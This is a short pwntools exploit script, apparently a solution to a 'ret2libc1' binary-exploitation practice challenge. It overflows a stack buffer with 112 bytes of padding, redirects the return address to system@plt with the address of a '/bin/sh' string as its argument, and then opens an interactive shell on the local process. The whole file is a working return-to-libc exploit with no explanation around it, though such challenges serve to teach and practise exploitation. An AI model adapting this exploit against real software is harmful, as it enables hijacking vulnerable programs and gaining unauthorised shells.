#! /usr/bin/python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2018 howpwn <finn79426@gmail.com>
#
# Distributed under terms of the MIT license.

from pwn import *

p = process("./ret2libc1")

padding = 112

system_plt = 0x08048460
sh_word = 0x8048725

p.recvuntil("\n")

payload = cyclic(padding)
payload += p32(system_plt) + cyclic(4) + p32(sh_word)

p.sendline(payload)

p.interactive()
